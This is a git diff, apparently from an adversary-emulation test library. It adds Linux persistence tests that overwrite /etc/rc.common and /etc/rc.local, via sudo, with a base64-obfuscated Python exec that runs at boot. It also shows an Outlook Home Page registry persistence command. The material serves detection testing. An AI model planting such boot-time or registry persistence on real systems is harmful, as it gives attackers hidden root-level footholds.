"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 0e530577..fda6082f 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -160,6 +160,8 @@ privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4 privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt privilege-escalation,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash +privilege-escalation,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash +privilege-escalation,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt @@ -536,6 +538,8 @@ persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell persistence,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash +persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash +persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh persistence,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index d4e71a68..89eb46ca 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -32,6 +32,8 @@ privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injecti privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash +privilege-escalation,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash +privilege-escalation,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh @@ -157,6 +159,8 @@ persistence,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash +persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash +persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index a9ae5a7c..e7646cfb 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -324,6 +324,8 @@ - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1037.004 RC Scripts](../../T1037.004/T1037.004.md) - Atomic Test #1: rc.common [macos] + - Atomic Test #2: rc.common [linux] + - Atomic Test #3: rc.local [linux] - [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) - Atomic Test #1: Re-Opened Applications [macos] - Atomic Test #2: Re-Opened Applications [macos] @@ -967,6 +969,8 @@ - T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1037.004 RC Scripts](../../T1037.004/T1037.004.md) - Atomic Test #1: rc.common [macos] + - Atomic Test #2: rc.common [linux] + - Atomic Test #3: rc.local [linux] - T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) - Atomic Test #1: Re-Opened Applications [macos] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index d1576879..6499f682 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -122,7 +122,9 @@ - T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1037.004 RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md) + - Atomic Test #2: rc.common [linux] + - Atomic Test #3: rc.local [linux] - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md) - Atomic Test #1: Make and modify binary from C source [macos, linux] @@ -451,7 +453,9 @@ - T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1037.004 RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md) + - Atomic Test #2: rc.common [linux] + - Atomic Test #3: rc.local [linux] - T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md index 241437be..420df707 100644 --- a/atomics/Indexes/Matrices/linux-matrix.md +++ b/atomics/Indexes/Matrices/linux-matrix.md @@ -23,7 +23,7 @@ | | [Systemd Timers](../../T1053.006/T1053.006.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Keylogging](../../T1056.001/T1056.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | | | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | | | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | @@ -40,7 +40,7 @@ | | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | -| | | RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [RC Scripts](../../T1037.004/T1037.004.md) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 69c30c6a..9500a007 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -15389,6 +15389,48 @@ privilege-escalation: ' elevation_required: true name: bash + - name: rc.common + auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a + description: 'Modify rc.common + +' + supported_platforms: + - linux + executor: + name: bash + elevation_required: true + command: | + filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi + printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common + echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common + printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common + sudo chmod +x /etc/rc.common + cleanup_command: 'origfilename=''/etc/rc.common.original'';if [ ! -f $origfilename + ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common + && sudo rm $origfilename;fi + +' + - name: rc.local + auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 + description: 'Modify rc.local + +' + supported_platforms: + - linux + executor: + name: bash + elevation_required: true + command: | + filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi + printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local + echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local + printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local + sudo chmod +x /etc/rc.local + cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename + ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && + sudo rm $origfilename;fi + +' T1547.007: technique: created: '2020-01-24T18:15:06.641Z' @@ -43035,6 +43077,48 @@ persistence: ' elevation_required: true name: bash + - name: rc.common + auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a + description: 'Modify rc.common + +' + supported_platforms: + - linux + executor: + name: bash + elevation_required: true + command: | + filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi + printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common + echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common + printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common + sudo chmod +x /etc/rc.common + cleanup_command: 'origfilename=''/etc/rc.common.original'';if [ ! -f $origfilename + ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common + && sudo rm $origfilename;fi + +' + - name: rc.local + auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 + description: 'Modify rc.local + +' + supported_platforms: + - linux + executor: + name: bash + elevation_required: true + command: | + filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi + printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local + echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local + printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local + sudo chmod +x /etc/rc.local + cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename + ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && + sudo rm $origfilename;fi + +' T1542.004: technique: created: '2020-10-20T00:05:48.790Z' diff --git a/atomics/T1037.004/T1037.004.md b/atomics/T1037.004/T1037.004.md index 994659fb..5e258a38 100644 --- a/atomics/T1037.004/T1037.004.md +++ b/atomics/T1037.004/T1037.004.md @@ -12,6 +12,10 @@ Several Unix-like systems have moved to Systemd and deprecated the use of RC scr - [Atomic Test #1 - rc.common](#atomic-test-1---rccommon) +- [Atomic Test #2 - rc.common](#atomic-test-2---rccommon) + +- [Atomic Test #3 - rc.local](#atomic-test-3---rclocal) +
@@ -38,4 +42,68 @@ sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /e +
+
+ +## Atomic Test #2 - rc.common +Modify rc.common + +**Supported Platforms:** Linux + + + + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi +printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common +echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common +printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common +sudo chmod +x /etc/rc.common +``` + +#### Cleanup Commands: +```bash +origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi +``` + + + + + +
+
+ +## Atomic Test #3 - rc.local +Modify rc.local + +**Supported Platforms:** Linux + + + + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi +printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local +echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local +printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local +sudo chmod +x /etc/rc.local +``` + +#### Cleanup Commands: +```bash +origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi +``` + + + + +
diff --git a/atomics/T1137.004/T1137.004.md b/atomics/T1137.004/T1137.004.md index 5e258a38..858ef875 100644 --- a/atomics/T1137.004/T1137.004.md +++ b/atomics/T1137.004/T1137.004.md @@ -1,105 +1,45 @@ -# T1037.004 - RC Scripts -## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/004) -
Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify. +# T1137.004 - Outlook Home Page +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137/004) +
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page) -Adversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence. - -Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware) - -Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)
+Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page) +
## Atomic Tests -- [Atomic Test #1 - rc.common](#atomic-test-1---rccommon) - -- [Atomic Test #2 - rc.common](#atomic-test-2---rccommon) - -- [Atomic Test #3 - rc.local](#atomic-test-3---rclocal) +- [Atomic Test #1 - Install Outlook Home Page Persistence](#atomic-test-1---install-outlook-home-page-persistence)
-## Atomic Test #1 - rc.common -Modify rc.common +## Atomic Test #1 - Install Outlook Home Page Persistence +This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed. -[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html) +Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox). -**Supported Platforms:** macOS +**Supported Platforms:** Windows - -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| url | URL to Outlook Home Page containing the payload to execute (can be local file:// or remote https://) | string | file://PathToAtomicsFolder\T1137.004\src\T1137.004.html| +| outlook_version | Version of Outlook that is installed | string | 16.0| +| outlook_folder | Name of the Outlook folder to modify the homepage setting for | string | Inbox| -```bash -sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common -``` +#### Attack Commands: Run with `command_prompt`! - - - - -
-
- -## Atomic Test #2 - rc.common -Modify rc.common - -**Supported Platforms:** Linux - - - - - -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) - - -```bash -filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi -printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common -echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common -printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common -sudo chmod +x /etc/rc.common +```cmd +reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f ``` #### Cleanup Commands: -```bash -origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi -``` - - - - - -
-
- -## Atomic Test #3 - rc.local -Modify rc.local - -**Supported Platforms:** Linux - - - - - -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) - - -```bash -filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi -printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local -echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local -printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local -sudo chmod +x /etc/rc.local -``` - -#### Cleanup Commands: -```bash -origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi +```cmd +reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f ```